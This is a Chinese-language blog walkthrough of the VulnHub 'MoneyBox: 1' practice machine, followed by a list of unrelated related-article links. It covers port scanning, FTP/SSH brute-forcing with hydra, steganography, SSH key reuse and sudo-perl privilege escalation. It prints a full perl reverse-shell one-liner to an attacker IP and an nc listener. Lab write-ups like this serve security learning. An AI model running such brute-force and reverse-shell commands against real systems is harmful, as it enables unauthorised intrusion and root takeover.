MONEYBOX: 1靶场打靶
前言
- 这是vulnhub上的一个简单靶场,网上冲浪的时候发现就下载下来做了一下,发点靶场的渗透过程,就当是学习笔记了。
靶场地址http://www.vulnhub.com/entry/moneybox-1,653/#download - 如果VMware里配置靶场环境有问题的话就下个Virtualbox,把靶机的ova文件导入到Virtualbox里。
Virtualbox的下载路径https://www.virtualbox.org/
配置靶场环境时遇到的坑
在导入ova文件到Virtualbox的时候会遇到的一个问题,导入的界面太大了,下面的选项看不到,这时候调一下分辨率或者直接回车就可以了。
我导入的时候还会遇到这个报错,点击更改网络设置在选好自己的网卡重新来一遍就好了。
遇到这个报错就打开靶场环境的设置在USB设备处,把启用USB控制器选项关了就行。
开始打靶
内网ip有点多,就指定22,21端口来分辨一下哪个是靶机,看到192.168.0.107的22,21端口都开了,多半是靶机了。
扫描全端口和详细的端口信息
看到ftp和ssh服务就想到暴力破解了,打开超级弱口令检测工具,简单爆破一下看看有没有发现。(工具会在附件分享)
爆破到了ftp的账号密码,这是ftp的允许匿名登陆,密码为空也是可以的。
ftp 192.168.0.107 输入账号anonymous,密码为空或者anonymous1234也可以,连接上ftp后ls一下,看看有什么内容。
把图片下载下来,图片名字trytofind,我们看看这张图片有没有用到CTF中常见的隐写术。
虽然查到了图片中的文件,但是查看文件需要密码,ftp这条线索到此就断了。
我们既然ssh没爆破出来就去看看80端口好了,打开浏览器访问。
80端口的网站主页也没什么有用的信息,查看网页源代码也没发现
那就目录扫描看看吧,用dirsearch目录扫描,个人感觉比御剑好多很多。
除了网站首页还扫到一个bolgs目录,访问看看,看似没什么有用的信息,查看网页源代码,拉到最下面。
这段洋屁的意思呢是说还有个叫S3cr3t-T3xt的隐藏目录,访问看看
找到密钥3xtr4ctd4t4,重新回到查看图片隐写处,输入密钥
cat查看图片中隐藏的data.txt,这是一封信件的格式,是告诉renu说他的密码太过于简单了,我们结合ssh端口。把用户名定位renu,用hydra爆破,这里爆破用的密码字典是kali自带的,如果没解压过的可以解压一下。
得到账号密码,renu 987654321
ssh renu@192.168.0.107连接靶机
连接到之后ls一下,user1.txt就是第一个flag
尝试su到root权限失败,查看有什么可以用root权限执行的命令也没有,好像线索又断了,查看一下history历史命令。
历史命令里有cd到home目录下的lily账号,又有把密钥发送给192.168.43.80的lily账号,我怀疑这里是靶场设置的错误了,没道理突然来个别的段的ip地址还跟本地有一个同样叫lily的账号。如果是设置错误,那就是把生成的密钥发送给了本地的lily账户,如果是这样的话就能不用账号密码,用密钥就能够登录lily账户,为了验证这个猜想,执行ssh lily@127.0.0.1
成功连接后ls一下,拿下第二个flag。再试试能不能在lily账户上su到root,再次失败了,sudo -l查看一下能sudo使用的命令。
lily用户能用sudo执行/usr/bin/perl
而perl可以反弹shell到kali攻击机上了,因为是sudo管理员权限启动的反弹shell,所以shell也是root权限的,网上找一条perl反弹shell的命令。
在lily用户的命令行输入
sudo perl -e ‘use Socket;$i=”你的攻击机ip地址”;$p=你监听的端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/bash -i”);};’
在攻击机监听
nc -nvlp 你的监听端口
收到shell,我以为就在root目录下ls一下就能看到最后一个flag了,然而最后一个flag是隐藏的文件,在root根目录下执行ls -a才能看见。
总结
渗透还是要多实操,有时候脑子没记住的,手记住了。
最后,求点赞
MONEYBOX: 1靶场打靶相关推荐
- 以太Ethernaut靶场打靶—6 Delegation
以太Ethernaut靶场打靶-6 Delegation 概括 源码审计 攻击 概括 本题主要是利用delegatecall函数的不严谨使用导致可以调用其他函数获取合约所有权可参考https://bl ...
- matlab入门学习资料
作者:3mjun 链接:https://www.zhihu.com/question/19904418/answer/105926809 来源:知乎 著作权归作者所有.商业转载请联系作者获得授权,非商 ...
- 2021年诺贝尔物理学奖——平衡混沌与秩序的复杂
导语 北京时间10月5日下午,2021年诺贝尔物理学奖揭晓,三位科学家因复杂系统研究贡献而获奖.真锅淑郎(Syukuro Manabe)和克劳斯·哈塞尔曼(Klaus Hasselmann)因为&qu ...
- BP神经网络算法推导及代码实现笔记zz
一. 前言: 作为AI入门小白,参考了一些文章,想记点笔记加深印象,发出来是给有需求的童鞋学习共勉,大神轻拍! [毒鸡汤]:算法这东西,读完之后的状态多半是 --> "我是谁,我在哪? ...
- AI从入门到放弃:BP神经网络算法推导及代码实现笔记
作者 | @Aloys (腾讯员工,后台工程师) 本文授权转自腾讯的知乎专栏 ▌一. 前言: 作为AI入门小白,参考了一些文章,想记点笔记加深印象,发出来是给有需求的童鞋学习共勉,大神轻拍! [毒鸡汤 ...
- 露天靶场建设方案,打靶设备和防弹墙作为主要工程建设
室内打靶场和室外打靶场的区别较大,对于不同地区的训练方式,需要建立相应需求的射击场,满足训练人员的实弹打靶训练和模拟打靶训练需求. 室内靶场设计标准是按照建设单位的需求来的,首先需要根据建设单位提供的 ...
- 激光打靶训练设备:室内靶场和室外靶场的设备区别
室内打靶场和室外打靶场的本质区别就是设备和场地的差距,在室内固定空间范围的射击最远是100米的射击距离,在室外靶场中射击距离200-300米都是较为常见的.在室内靶场中线路铺设和网络布控多,智能化体现 ...
- 打靶归来 - 详解upload-labs靶场(上)
一.环境准备 ① - 靶场的搭建 下载地址:upload-labs upload-labs靶场曾有过一次更新,更新新添加了一道Pass-05,有一些以前的教程的题号与这篇教程不符合,请各位自行分辨 本 ...
- 打靶归来 - 详解upload-labs靶场(下)
一.环境准备 ① - 靶场的搭建 下载地址:upload-labs upload-labs靶场曾有过一次更新,更新新添加了一道Pass-05,有一些以前的教程的题号与这篇教程不符合,请各位自行分辨 本 ...
最新文章
- 如何为应用选择最佳的FPGA(下)
- 关于arduino和zigbee串口16进制通信问题
- python读excel字体颜色_python 设置 excel 单元格颜色填充和字体效果
- c php base64,C语言实现base64编码,base64解码
- pycharm pyqt5 pyrrc_编程基础 | Pycharm安装、配置、快捷键
- anglar ajax执行2次的原因,AngularJS与Ajax表单提交需要单击两次
- 阿里王帅回应“马云被印度法院传唤”:马云太难找,要去HHB酒吧试试
- mysql 针对table的查看命令行
- JavaScript算术运算中前加加与后加加
- android_x86安装arm转译
- (imooc笔记)短除法计算算 十进制 八进制 十六进制
- “女人~,你在玩火”一个有磁性的声音说道——常用自动化测试工具
- 1194_SICP学习笔记_霍夫曼编码树
- mybatis集成springboot的多数据源最新实现
- 通过Flex布局设置水平垂直居中
- 个税局端服务器处理结果查询不到三方协议,「实用」电子税务局中三方协议验证失败如何处理?来看攻略啦!...
- http协议工作过程
- 二级 c语言 资料,计算机二级C语言复习资料
- P1655 小朋友的球
- 深度学习框架之paddlepaddle
热门文章
- ThinkPHP 路由使用
- RTC月度小报6月 |编程挑战赛圆满收官;声网上市1周年回顾...
- “误入”清华夸夸群?一行Python代码帮你写个机器人
- Kafka使用脚本根据时间重置消费位移,格式你写对了么?
- Delphi CreateProcess
- ROS实战( 三 )利用科大讯飞tts实现ROS下语音合成播报
- 搭建vue3项目时出现Cannot read property ‘nextSibling‘ of null报错
- 【Java】文件上传及下载、限制文件大小
- dagger android,在Android开发中使用Dagger2的方法
- iOS RTMP 视频直播开发笔记(4) ---- 视频清晰度 BP,EP,MP,HP